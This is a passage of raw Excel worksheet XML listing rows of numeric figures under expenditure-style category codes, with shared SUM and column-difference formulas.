        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AI665" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AJ665" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AK665" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AL665" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AM665" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AN665" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AO665" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AP665" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
    </row>
    <row r="666" ht="18" customHeight="1" spans="1:42">
      <c r="A666" s="10"/>
      <c r="B666" s="10"/>
      <c r="C666" s="28"/>
      <c r="D666" s="10">
        <v>2082804</v>
      </c>
      <c r="E666" s="16" t="s">
        <v>3476</v>
      </c>
      <c r="F666" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G666" s="17"/>
      <c r="H666" s="17"/>
      <c r="I666" s="17"/>
      <c r="J666" s="17"/>
      <c r="K666" s="17"/>
      <c r="L666" s="17"/>
      <c r="M666" s="17"/>
      <c r="N666" s="17"/>
      <c r="O666" s="17"/>
      <c r="P666" s="17"/>
      <c r="Q666" s="17"/>
      <c r="R666" s="17"/>
      <c r="S666" s="17"/>
      <c r="T666" s="17"/>
      <c r="U666" s="17"/>
      <c r="V666" s="17"/>
      <c r="W666" s="17"/>
      <c r="X666" s="17"/>
      <c r="Y666" s="17"/>
      <c r="Z666" s="17"/>
      <c r="AA666" s="17"/>
      <c r="AB666" s="17"/>
      <c r="AC666" s="17"/>
      <c r="AD666" s="17"/>
      <c r="AE666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AF666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AG666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AH666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AI666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AJ666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AK666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AL666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AM666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AN666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AO666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AP666" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
    </row>
    <row r="667" ht="18" customHeight="1" spans="1:42">
      <c r="A667" s="10"/>
      <c r="B667" s="10"/>
      <c r="C667" s="28"/>
      <c r="D667" s="10">
        <v>2082805</v>
      </c>
      <c r="E667" s="16" t="s">
        <v>3477</v>
      </c>
      <c r="F667" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G667" s="17"/>
      <c r="H667" s="17"/>
      <c r="I667" s="17"/>
      <c r="J667" s="17"/>
      <c r="K667" s="17"/>
      <c r="L667" s="17"/>
      <c r="M667" s="17"/>
      <c r="N667" s="17"/>
      <c r="O667" s="17"/>
      <c r="P667" s="17"/>
      <c r="Q667" s="17"/>
      <c r="R667" s="17"/>
      <c r="S667" s="17"/>
      <c r="T667" s="17"/>
      <c r="U667" s="17"/>
      <c r="V667" s="17"/>
      <c r="W667" s="17"/>
      <c r="X667" s="17"/>
      <c r="Y667" s="17"/>
      <c r="Z667" s="17"/>
      <c r="AA667" s="17"/>
      <c r="AB667" s="17"/>
      <c r="AC667" s="17"/>
      <c r="AD667" s="17"/>
      <c r="AE667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AF667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AG667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AH667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AI667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AJ667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AK667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AL667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AM667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AN667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AO667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AP667" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
    </row>
    <row r="668" ht="18" customHeight="1" spans="1:42">
      <c r="A668" s="10"/>
      <c r="B668" s="10"/>
      <c r="C668" s="28"/>
      <c r="D668" s="10">
        <v>2082850</v>
      </c>
      <c r="E668" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F668" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G668" s="17"/>
      <c r="H668" s="17"/>
      <c r="I668" s="17"/>
      <c r="J668" s="17"/>
      <c r="K668" s="17"/>
      <c r="L668" s="17"/>
      <c r="M668" s="17"/>
      <c r="N668" s="17"/>
      <c r="O668" s="17"/>
      <c r="P668" s="17"/>
      <c r="Q668" s="17"/>
      <c r="R668" s="17"/>
      <c r="S668" s="17"/>
      <c r="T668" s="17"/>
      <c r="U668" s="17"/>
      <c r="V668" s="17"/>
      <c r="W668" s="17"/>
      <c r="X668" s="17"/>
      <c r="Y668" s="17"/>
      <c r="Z668" s="17"/>
      <c r="AA668" s="17"/>
      <c r="AB668" s="17"/>
      <c r="AC668" s="17"/>
      <c r="AD668" s="17"/>
      <c r="AE668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AF668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AG668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AH668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AI668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AJ668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AK668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AL668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AM668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AN668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AO668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AP668" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
    </row>
    <row r="669" ht="18" customHeight="1" spans="1:42">
      <c r="A669" s="10"/>
      <c r="B669" s="10"/>
      <c r="C669" s="28"/>
      <c r="D669" s="10">
        <v>2082899</v>
      </c>
      <c r="E669" s="16" t="s">
        <v>3478</v>
      </c>
      <c r="F669" s="14">
        <f t="shared" si="301"/>
        <v>3</v>
      </c>
      <c r="G669" s="17"/>
      <c r="H669" s="17"/>
      <c r="I669" s="17"/>
      <c r="J669" s="17"/>
      <c r="K669" s="17"/>
      <c r="L669" s="17">
        <v>3</v>
      </c>
      <c r="M669" s="17"/>
      <c r="N669" s="17"/>
      <c r="O669" s="17"/>
      <c r="P669" s="17"/>
      <c r="Q669" s="17"/>
      <c r="R669" s="17"/>
      <c r="S669" s="17"/>
      <c r="T669" s="17"/>
      <c r="U669" s="17"/>
      <c r="V669" s="17"/>
      <c r="W669" s="17"/>
      <c r="X669" s="17">
        <v>3</v>
      </c>
      <c r="Y669" s="17"/>
      <c r="Z669" s="17"/>
      <c r="AA669" s="17"/>
      <c r="AB669" s="17"/>
      <c r="AC669" s="17"/>
      <c r="AD669" s="17"/>
      <c r="AE669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AF669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AG669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AH669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AI669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AJ669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AK669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AL669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AM669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AN669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AO669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
      <c r="AP669" s="17">
        <f t="shared" si="317"/>
        <v>0</v>
      </c>
    </row>
    <row r="670" ht="18" customHeight="1" spans="1:42">
      <c r="A670" s="10"/>
      <c r="B670" s="10"/>
      <c r="C670" s="28"/>
      <c r="D670" s="10">
        <v>20830</v>
      </c>
      <c r="E670" s="11" t="s">
        <v>3479</v>
      </c>
      <c r="F670" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G670" s="12">
        <f t="shared" ref="G670:R670" si="318">SUM(G671:G672)</f>
        <v>0</v>
      </c>
      <c r="H670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="I670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="J670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="K670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="L670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="M670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="N670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="O670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="P670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="Q670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="R670" s="12">
        <f t="shared" si="318"/>
        <v>0</v>
      </c>
      <c r="S670" s="12">
        <v>0</v>
      </c>
      <c r="T670" s="12">
        <v>0</v>
      </c>
      <c r="U670" s="12">
        <v>0</v>
      </c>
      <c r="V670" s="12">
        <v>0</v>
      </c>
      <c r="W670" s="12">
        <v>0</v>
      </c>
      <c r="X670" s="12">
        <v>0</v>
      </c>
      <c r="Y670" s="12">
        <v>0</v>
      </c>
      <c r="Z670" s="12">
        <v>0</v>
      </c>
      <c r="AA670" s="12">
        <v>0</v>
      </c>
      <c r="AB670" s="12">
        <v>0</v>
      </c>
      <c r="AC670" s="12">
        <v>0</v>
      </c>
      <c r="AD670" s="12">
        <v>0</v>
      </c>
      <c r="AE670" s="12">
        <f t="shared" ref="AE670:AP670" si="319">SUM(AE671:AE672)</f>
        <v>0</v>
      </c>
      <c r="AF670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AG670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AH670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AI670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AJ670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AK670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AL670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AM670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AN670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AO670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
      <c r="AP670" s="12">
        <f t="shared" si="319"/>
        <v>0</v>
      </c>
    </row>
    <row r="671" ht="18" customHeight="1" spans="1:42">
      <c r="A671" s="10"/>
      <c r="B671" s="10"/>
      <c r="C671" s="28"/>
      <c r="D671" s="10">
        <v>2083001</v>
      </c>
      <c r="E671" s="16" t="s">
        <v>3480</v>
      </c>
      <c r="F671" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G671" s="17"/>
      <c r="H671" s="17"/>
      <c r="I671" s="17"/>
      <c r="J671" s="17"/>
      <c r="K671" s="17"/>
      <c r="L671" s="17"/>
      <c r="M671" s="17"/>
      <c r="N671" s="17"/>
      <c r="O671" s="17"/>
      <c r="P671" s="17"/>
      <c r="Q671" s="17"/>
      <c r="R671" s="17"/>
      <c r="S671" s="17"/>
      <c r="T671" s="17"/>
      <c r="U671" s="17"/>
      <c r="V671" s="17"/>
      <c r="W671" s="17"/>
      <c r="X671" s="17"/>
      <c r="Y671" s="17"/>
      <c r="Z671" s="17"/>
      <c r="AA671" s="17"/>
      <c r="AB671" s="17"/>
      <c r="AC671" s="17"/>
      <c r="AD671" s="17"/>
      <c r="AE671" s="17">
        <f t="shared" ref="AE671:AP672" si="320">G671-S671</f>
        <v>0</v>
      </c>
      <c r="AF671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AG671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AH671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AI671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AJ671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AK671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AL671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AM671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AN671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AO671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AP671" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
    </row>
    <row r="672" ht="18" customHeight="1" spans="1:42">
      <c r="A672" s="10"/>
      <c r="B672" s="10"/>
      <c r="C672" s="28"/>
      <c r="D672" s="10">
        <v>2083099</v>
      </c>
      <c r="E672" s="16" t="s">
        <v>3481</v>
      </c>
      <c r="F672" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G672" s="17"/>
      <c r="H672" s="17"/>
      <c r="I672" s="17"/>
      <c r="J672" s="17"/>
      <c r="K672" s="17"/>
      <c r="L672" s="17"/>
      <c r="M672" s="17"/>
      <c r="N672" s="17"/>
      <c r="O672" s="17"/>
      <c r="P672" s="17"/>
      <c r="Q672" s="17"/>
      <c r="R672" s="17"/>
      <c r="S672" s="17"/>
      <c r="T672" s="17"/>
      <c r="U672" s="17"/>
      <c r="V672" s="17"/>
      <c r="W672" s="17"/>
      <c r="X672" s="17"/>
      <c r="Y672" s="17"/>
      <c r="Z672" s="17"/>
      <c r="AA672" s="17"/>
      <c r="AB672" s="17"/>
      <c r="AC672" s="17"/>
      <c r="AD672" s="17"/>
      <c r="AE672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AF672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AG672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AH672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AI672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AJ672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AK672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AL672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AM672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AN672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AO672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
      <c r="AP672" s="17">
        <f t="shared" si="320"/>
        <v>0</v>
      </c>
    </row>
    <row r="673" ht="18" customHeight="1" spans="1:42">
      <c r="A673" s="10"/>
      <c r="B673" s="10"/>
      <c r="C673" s="28"/>
      <c r="D673" s="10">
        <v>20899</v>
      </c>
      <c r="E673" s="11" t="s">
        <v>3482</v>
      </c>
      <c r="F673" s="14">
        <f t="shared" si="301"/>
        <v>109</v>
      </c>
      <c r="G673" s="12">
        <f t="shared" ref="G673:R673" si="321">G674</f>
        <v>5</v>
      </c>
      <c r="H673" s="12">
        <f t="shared" si="321"/>
        <v>0</v>
      </c>
      <c r="I673" s="12">
        <f t="shared" si="321"/>
        <v>5</v>
      </c>
      <c r="J673" s="12">
        <f t="shared" si="321"/>
        <v>6</v>
      </c>
      <c r="K673" s="12">
        <f t="shared" si="321"/>
        <v>0</v>
      </c>
      <c r="L673" s="12">
        <f t="shared" si="321"/>
        <v>72</v>
      </c>
      <c r="M673" s="12">
        <f t="shared" si="321"/>
        <v>0</v>
      </c>
      <c r="N673" s="12">
        <f t="shared" si="321"/>
        <v>4</v>
      </c>
      <c r="O673" s="12">
        <f t="shared" si="321"/>
        <v>0</v>
      </c>
      <c r="P673" s="12">
        <f t="shared" si="321"/>
        <v>0</v>
      </c>
      <c r="Q673" s="12">
        <f t="shared" si="321"/>
        <v>22</v>
      </c>
      <c r="R673" s="12">
        <f t="shared" si="321"/>
        <v>0</v>
      </c>
      <c r="S673" s="12">
        <v>4</v>
      </c>
      <c r="T673" s="12">
        <v>0</v>
      </c>
      <c r="U673" s="12">
        <v>5</v>
      </c>
      <c r="V673" s="12">
        <v>6</v>
      </c>
      <c r="W673" s="12">
        <v>0</v>
      </c>
      <c r="X673" s="12">
        <v>67</v>
      </c>
      <c r="Y673" s="12">
        <v>0</v>
      </c>
      <c r="Z673" s="12">
        <v>0</v>
      </c>
      <c r="AA673" s="12">
        <v>0</v>
      </c>
      <c r="AB673" s="12">
        <v>0</v>
      </c>
      <c r="AC673" s="12">
        <v>22</v>
      </c>
      <c r="AD673" s="12">
        <v>0</v>
      </c>
      <c r="AE673" s="12">
        <f t="shared" ref="AE673:AP673" si="322">AE674</f>
        <v>1</v>
      </c>
      <c r="AF673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
      <c r="AG673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
      <c r="AH673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
      <c r="AI673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
      <c r="AJ673" s="12">
        <f t="shared" si="322"/>
        <v>5</v>
      </c>
      <c r="AK673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
      <c r="AL673" s="12">
        <f t="shared" si="322"/>
        <v>4</v>
      </c>
      <c r="AM673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
      <c r="AN673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
      <c r="AO673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
      <c r="AP673" s="12">
        <f t="shared" si="322"/>
        <v>0</v>
      </c>
    </row>
    <row r="674" ht="18" customHeight="1" spans="1:42">
      <c r="A674" s="10"/>
      <c r="B674" s="10"/>
      <c r="C674" s="28"/>
      <c r="D674" s="10">
        <v>2089999</v>
      </c>
      <c r="E674" s="16" t="s">
        <v>3483</v>
      </c>
      <c r="F674" s="14">
        <f t="shared" si="301"/>
        <v>109</v>
      </c>
      <c r="G674" s="17">
        <v>5</v>
      </c>
      <c r="H674" s="17"/>
      <c r="I674" s="17">
        <v>5</v>
      </c>
      <c r="J674" s="17">
        <v>6</v>
      </c>
      <c r="K674" s="17"/>
      <c r="L674" s="17">
        <v>72</v>
      </c>
      <c r="M674" s="17"/>
      <c r="N674" s="17">
        <v>4</v>
      </c>
      <c r="O674" s="17"/>
      <c r="P674" s="17"/>
      <c r="Q674" s="17">
        <v>22</v>
      </c>
      <c r="R674" s="17"/>
      <c r="S674" s="17">
        <v>4</v>
      </c>
      <c r="T674" s="17"/>
      <c r="U674" s="17">
        <v>5</v>
      </c>
      <c r="V674" s="17">
        <v>6</v>
      </c>
      <c r="W674" s="17"/>
      <c r="X674" s="17">
        <v>67</v>
      </c>
      <c r="Y674" s="17"/>
      <c r="Z674" s="17"/>
      <c r="AA674" s="17"/>
      <c r="AB674" s="17"/>
      <c r="AC674" s="17">
        <v>22</v>
      </c>
      <c r="AD674" s="17"/>
      <c r="AE674" s="17">
        <f>G674-S674</f>
        <v>1</v>
      </c>
      <c r="AF674" s="17">
        <f t="shared" ref="AF674:AP674" si="323">H674-T674</f>
        <v>0</v>
      </c>
      <c r="AG674" s="17">
        <f t="shared" si="323"/>
        <v>0</v>
      </c>
      <c r="AH674" s="17">
        <f t="shared" si="323"/>
        <v>0</v>
      </c>
      <c r="AI674" s="17">
        <f t="shared" si="323"/>
        <v>0</v>
      </c>
      <c r="AJ674" s="17">
        <f t="shared" si="323"/>
        <v>5</v>
      </c>
      <c r="AK674" s="17">
        <f t="shared" si="323"/>
        <v>0</v>
      </c>
      <c r="AL674" s="17">
        <f t="shared" si="323"/>
        <v>4</v>
      </c>
      <c r="AM674" s="17">
        <f t="shared" si="323"/>
        <v>0</v>
      </c>
      <c r="AN674" s="17">
        <f t="shared" si="323"/>
        <v>0</v>
      </c>
      <c r="AO674" s="17">
        <f t="shared" si="323"/>
        <v>0</v>
      </c>
      <c r="AP674" s="17">
        <f t="shared" si="323"/>
        <v>0</v>
      </c>
    </row>
    <row r="675" ht="18" customHeight="1" spans="1:42">
      <c r="A675" s="10"/>
      <c r="B675" s="10"/>
      <c r="C675" s="28"/>
      <c r="D675" s="10">
        <v>210</v>
      </c>
      <c r="E675" s="11" t="s">
        <v>3484</v>
      </c>
      <c r="F675" s="14">
        <f t="shared" si="301"/>
        <v>962</v>
      </c>
      <c r="G675" s="12">
        <f t="shared" ref="G675:R675" si="324">G676+G681+G695+G699+G711+G714+G718+G723+G727+G731+G734+G743+G745</f>
        <v>129</v>
      </c>
      <c r="H675" s="12">
        <f t="shared" si="324"/>
        <v>0</v>
      </c>
      <c r="I675" s="12">
        <f t="shared" si="324"/>
        <v>195</v>
      </c>
      <c r="J675" s="12">
        <f t="shared" si="324"/>
        <v>118</v>
      </c>
      <c r="K675" s="12">
        <f t="shared" si="324"/>
        <v>72</v>
      </c>
      <c r="L675" s="12">
        <f t="shared" si="324"/>
        <v>112</v>
      </c>
      <c r="M675" s="12">
        <f t="shared" si="324"/>
        <v>87</v>
      </c>
      <c r="N675" s="12">
        <f t="shared" si="324"/>
        <v>68</v>
      </c>
      <c r="O675" s="12">
        <f t="shared" si="324"/>
        <v>56</v>
      </c>
      <c r="P675" s="12">
        <f t="shared" si="324"/>
        <v>52</v>
      </c>
      <c r="Q675" s="12">
        <f t="shared" si="324"/>
        <v>146</v>
      </c>
      <c r="R675" s="12">
        <f t="shared" si="324"/>
        <v>56</v>
      </c>
      <c r="S675" s="12">
        <v>120</v>
      </c>
      <c r="T675" s="12">
        <v>0</v>
      </c>
      <c r="U675" s="12">
        <v>175</v>
      </c>
      <c r="V675" s="12">
        <v>109</v>
      </c>
      <c r="W675" s="12">
        <v>67</v>
      </c>
      <c r="X675" s="12">
        <v>100</v>
      </c>
      <c r="Y675" s="12">
        <v>80</v>
      </c>
      <c r="Z675" s="12">
        <v>62</v>
      </c>
      <c r="AA675" s="12">
        <v>54</v>
      </c>
      <c r="AB675" s="12">
        <v>48</v>
      </c>
      <c r="AC675" s="12">
        <v>132</v>
      </c>
      <c r="AD675" s="12">
        <v>56</v>
      </c>
      <c r="AE675" s="12">
        <f t="shared" ref="AE675:AP675" si="325">AE676+AE681+AE695+AE699+AE711+AE714+AE718+AE723+AE727+AE731+AE734+AE743+AE745</f>
        <v>9</v>
      </c>
      <c r="AF675" s="12">
        <f t="shared" si="325"/>
        <v>0</v>
      </c>
      <c r="AG675" s="12">
        <f t="shared" si="325"/>
        <v>20</v>
      </c>
      <c r="AH675" s="12">
        <f t="shared" si="325"/>
        <v>9</v>
      </c>
      <c r="AI675" s="12">
        <f t="shared" si="325"/>
        <v>5</v>
      </c>
      <c r="AJ675" s="12">
        <f t="shared" si="325"/>
        <v>12</v>
      </c>
      <c r="AK675" s="12">
        <f t="shared" si="325"/>
        <v>7</v>
      </c>
      <c r="AL675" s="12">
        <f t="shared" si="325"/>
        <v>6</v>
      </c>
      <c r="AM675" s="12">
        <f t="shared" si="325"/>
        <v>2</v>
      </c>
      <c r="AN675" s="12">
        <f t="shared" si="325"/>
        <v>4</v>
      </c>
      <c r="AO675" s="12">
        <f t="shared" si="325"/>
        <v>14</v>
      </c>
      <c r="AP675" s="12">
        <f t="shared" si="325"/>
        <v>0</v>
      </c>
    </row>
    <row r="676" ht="18" customHeight="1" spans="1:42">
      <c r="A676" s="10"/>
      <c r="B676" s="10"/>
      <c r="C676" s="28"/>
      <c r="D676" s="10">
        <v>21001</v>
      </c>
      <c r="E676" s="11" t="s">
        <v>3485</v>
      </c>
      <c r="F676" s="14">
        <f t="shared" si="301"/>
        <v>96</v>
      </c>
      <c r="G676" s="12">
        <f t="shared" ref="G676:R676" si="326">SUM(G677:G680)</f>
        <v>0</v>
      </c>
      <c r="H676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="I676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="J676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="K676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="L676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="M676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="N676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="O676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="P676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="Q676" s="12">
        <f t="shared" si="326"/>
        <v>96</v>
      </c>
      <c r="R676" s="12">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="S676" s="12">
        <v>0</v>
      </c>
      <c r="T676" s="12">
        <v>0</v>
      </c>
      <c r="U676" s="12">
        <v>0</v>
      </c>
      <c r="V676" s="12">
        <v>0</v>
      </c>
      <c r="W676" s="12">
        <v>0</v>
      </c>
      <c r="X676" s="12">
        <v>0</v>
      </c>
      <c r="Y676" s="12">
        <v>0</v>
      </c>
      <c r="Z676" s="12">
        <v>0</v>
      </c>
      <c r="AA676" s="12">
        <v>0</v>
      </c>
      <c r="AB676" s="12">
        <v>0</v>
      </c>
      <c r="AC676" s="12">
        <v>88</v>
      </c>
      <c r="AD676" s="12">
        <v>0</v>
      </c>
      <c r="AE676" s="12">
        <f t="shared" ref="AE676:AP676" si="327">SUM(AE677:AE680)</f>
        <v>0</v>
      </c>
      <c r="AF676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AG676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AH676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AI676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AJ676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AK676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AL676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AM676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AN676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
      <c r="AO676" s="12">
        <f t="shared" si="327"/>
        <v>8</v>
      </c>
      <c r="AP676" s="12">
        <f t="shared" si="327"/>
        <v>0</v>
      </c>
    </row>
    <row r="677" ht="18" customHeight="1" spans="1:42">
      <c r="A677" s="10"/>
      <c r="B677" s="10"/>
      <c r="C677" s="28"/>
      <c r="D677" s="10">
        <v>2100101</v>
      </c>
      <c r="E677" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F677" s="14">
        <f t="shared" si="301"/>
        <v>96</v>
      </c>
      <c r="G677" s="17"/>
      <c r="H677" s="17"/>
      <c r="I677" s="17"/>
      <c r="J677" s="17"/>
      <c r="K677" s="17"/>
      <c r="L677" s="17"/>
      <c r="M677" s="17"/>
      <c r="N677" s="17"/>
      <c r="O677" s="17"/>
      <c r="P677" s="17"/>
      <c r="Q677" s="17">
        <v>96</v>
      </c>
      <c r="R677" s="17"/>
      <c r="S677" s="17"/>
      <c r="T677" s="17"/>
      <c r="U677" s="17"/>
      <c r="V677" s="17"/>
      <c r="W677" s="17"/>
      <c r="X677" s="17"/>
      <c r="Y677" s="17"/>
      <c r="Z677" s="17"/>
      <c r="AA677" s="17"/>
      <c r="AB677" s="17"/>
      <c r="AC677" s="17">
        <v>88</v>
      </c>
      <c r="AD677" s="17"/>
      <c r="AE677" s="17">
        <f t="shared" ref="AE677:AP680" si="328">G677-S677</f>
        <v>0</v>
      </c>
